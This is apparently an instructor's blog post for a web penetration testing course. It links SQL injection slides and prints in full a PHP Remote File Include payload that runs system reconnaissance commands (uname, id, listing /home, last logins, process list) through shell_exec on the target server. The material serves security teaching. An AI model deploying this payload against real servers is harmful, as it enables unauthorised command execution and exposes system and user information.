Quick post for my current SEC542 Students

Of course if you aren’t one of my students you still can read this. 🙂

In class I showed some extra slides on SQL injection. They are here http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited

Additionally, for the RFI (Remote File Include) examples, I showed a text file with the following in it:

<?php
$command='uname -a;id -a';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";

echo "<hr size=3>";
$command='ls -lABF /home/';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";

echo "<hr size=3>";
$command='last -10';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";

echo "<hr size=3>";
$command='ps -aux';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";
?>

There were also some YouTube videos I referred to in class:

Enjoy!

Comments are closed.

A WordPress.com Website.

Up ↑

%d bloggers like this: